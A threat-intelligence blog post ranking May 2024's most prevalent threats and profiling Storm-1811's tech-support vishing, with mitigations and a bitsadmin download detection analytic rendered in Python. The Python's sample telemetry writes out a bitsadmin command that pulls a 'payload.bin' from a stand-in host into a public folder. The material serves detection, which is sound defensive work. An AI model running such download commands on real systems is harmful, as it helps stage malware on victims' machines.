
Intelligence Insights: June 2024

Storm-1811 rolls in and JavaScript lures remain popular in this month’s edition of Intelligence Insights

The Red Canary Team
Originally published . Last modified .

Highlights from May

After dropping out of the rankings last month, Atomic Stealer is back on our top 10 most prevalent threat list. It returned at its highest rank so far in our top 10, in a three-way tie for 2nd with SocGholish and this month’s top 10 newcomer, Storm-1811, which we share more about below.

XMRig activity increased enough to tie for 6th with Mimikatz, making this XMRig’s second appearance on the list after its December 2023 debut. Yellow Cockatoo also returned to the top 10 after a few months of reduced activity.

We had several familiar faces stay on the list in new positions, including Gootloader, which moved up from 8th to 5th, and Scarlet Goldfinch, which dropped from 3rd to 8th. Raspberry Robin, another list regular, fell out of the top 10 altogether in May.

This month’s Top 10 threats

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.

Here’s how the numbers shook out for May 2024:

Month's rank | Threat name | Threat description
--- | --- | ---
1 | Impacket | Collection of Python classes to construct/manipulate network protocols
2* | Atomic Stealer | Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets
2* | SocGholish | Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code
2* | Storm-1811 | Financially motivated threat actor and Black Basta affiliate who uses tech support scams and RMM tools, notably Microsoft Quick Assist, for initial access
5 | Gootloader | JScript dropper/downloader that typically poses as a document containing an "agreement," often distributed through search engine redirects
6* | Mimikatz | Open source tool that dumps credentials using various techniques
6* | XMRig | Monero cryptocurrency miner that is often deployed as a secondary payload
8* |  | Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives
8* |  | Malware family capable of a range of behaviors, including DLL side-loading, capturing the screen, and keylogging
8* | Scarlet Goldfinch | Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems
8* | Yellow Cockatoo | Activity cluster characterized by the delivery of an information stealer and .NET RAT via search engine redirects

⬆ = trending up from previous month
⬇ = trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Tracking Storm-1811’s help desk scams

Our newcomer to the list this month is Storm-1811. Beginning in late April 2024 and continuing throughout May, Red Canary saw an activity cluster that we are tracking as Storm-1811. This is Microsoft’s name for a financially motivated threat actor that uses social engineering to gain initial access to environments via remote monitoring and management (RMM) tools—including Microsoft Quick Assist—on victim endpoints.

Storm-1811 leverages different communication methods in ways that increase the effectiveness of their social engineering scams. They use voice phishing (aka vishing) and call users masquerading as tech support, sometimes after reportedly flooding the users’ inboxes with emails. In recent attacks they have also reportedly used Microsoft Teams messages to increase their credibility as IT staff, according to Microsoft. The adversary convinces victims to provide remote access through Microsoft Quick Assist or by downloading and running AnyDesk.

After the adversary gains access, we observed Storm-1811 using curl to download additional tools like OpenSSH, ScreenConnect, and NetSupport Manager. Other reported payloads include Impacket, used for lateral movement, and PsExec, used to deploy Black Basta ransomware.

Social engineering attacks are, admittedly, hard to combat. Some mitigation strategies to consider are:

  • Train users to verify the identity of IT staff who call them through trusted internal methods, for example confirming identities over a video call or requiring a shared secret such as the serial number of the endpoint in question.
  • Quick Assist is installed by default on Windows machines. If it is not in use in your environment, disable or uninstall it.
  • Inventory the RMM tools that are approved for use in your environment. Investigate security alerts for unapproved RMMs, as well as suspicious activity involving approved RMMs. If possible, block RMMs commonly used in malicious attacks—for example, NetSupport, AnyDesk, and ScreenConnect—that aren’t in use in your environment.

 

Red Canary also saw Storm-1811 use bitsadmin.exe to download follow-on payloads. This gives us a detection opportunity.

Detection opportunity: Executing the Background Intelligent Transfer Service (bitsadmin.exe) to download files

This pseudo detection analytic identifies execution of the Background Intelligent Transfer Service (bitsadmin.exe) with command-line options that indicate a file download. Adversaries like Storm-1811 use bitsadmin.exe to download malware as a way of bypassing application whitelisting solutions. Note that bitsadmin.exe may be used legitimately by some administration software in your environment.

process == (bitsadmin)
&&
command_line_includes == (download)
&&
deobfuscated_command_line_includes == (bitsadmin, download)
&&
command_line_does_not_include == (*)

 

Note: * is a placeholder for strings associated with legitimate use of bitsadmin in your environment.
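The pseudo-analytic above, rendered as a runnable Python filter over constructed process-event telemetry (an added example, not Red Canary's detection code). `deobfuscate` is a stand-in for whatever normalization produces the analytic's deobfuscated_command_line field, and LEGITIMATE_MARKERS are hypothetical exclusion strings standing in for the `*` placeholder.

```python
import ntpath

# Constructed stand-ins for the analytic's '*' exclusion: strings that mark
# legitimate bitsadmin use in a hypothetical environment; tune per environment.
LEGITIMATE_MARKERS = ("patchserver.corp.example", r"C:\ProgramData\ApprovedUpdater")

def deobfuscate(command_line: str) -> str:
    """Cheap stand-in for the analytic's 'deobfuscated_command_line' field: drop
    cmd.exe caret escapes and inserted quotes, collapse whitespace, lowercase."""
    cleaned = command_line.replace("^", "").replace('"', "")
    return " ".join(cleaned.split()).lower()

def matches_bitsadmin_download(event: dict, exclusions=LEGITIMATE_MARKERS) -> bool:
    """True when the event satisfies all four clauses of the analytic."""
    # process == (bitsadmin): compare the image basename, extension stripped
    image = ntpath.basename(event["process"]).lower()
    if image.removesuffix(".exe") != "bitsadmin":
        return False
    raw = event["command_line"]
    # command_line_includes == (download)
    if "download" not in raw.lower():
        return False
    # deobfuscated_command_line_includes == (bitsadmin, download)
    deob = deobfuscate(raw)
    if "bitsadmin" not in deob or "download" not in deob:
        return False
    # command_line_does_not_include == (*): exclusions for known-good usage
    return not any(marker.lower() in raw.lower() for marker in exclusions)

def triage(events: list[dict]) -> list[str]:
    """Run the analytic over a batch; return the command lines that fire."""
    return [e["command_line"] for e in events if matches_bitsadmin_download(e)]

# Constructed sample telemetry (not real observed command lines): a pull into a
# world-writable folder (fires), an approved patch download (excluded by a
# marker), and a job listing (no download clause, so never considered).
SAMPLE_EVENTS = [
    {"process": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin.exe /transfer job1 /download /priority high http://files.example/payload.bin C:\Users\Public\payload.bin"},
    {"process": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r'BITSADMIN.EXE /Transfer "kb update" /Download http://patchserver.corp.example/kb.msu C:\ProgramData\ApprovedUpdater\kb.msu'},
    {"process": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin.exe /list /allusers /verbose"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("ALERT:", hit)
```

The process clause keys on bitsadmin.exe itself, so a cmd.exe parent that merely contains the word in its arguments does not fire; the exclusion tuple is where each environment's legitimate patterns go.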

In case you missed it: Open your scripts with Notepad

Many malware families use scripts as part of their intrusions. Scripts have been popular with adversaries for years, a trend that shows no sign of slowing down. These lures come in multiple script types, including JavaScript, and are delivered in multiple ways.

One way to mitigate script execution when a trusting user opens a malicious script is to create a Group Policy Object (GPO) that changes the default behavior of commonly misused script extensions, making them behave like benign text files that open in Notepad rather than automatically executing. On May 31, Jeff Felling and Red Canary published a blog about recent prevalent threats like SocGholish and Gootloader that use this technique, and shared specific details on how to create these GPOs to help protect your environment.

 
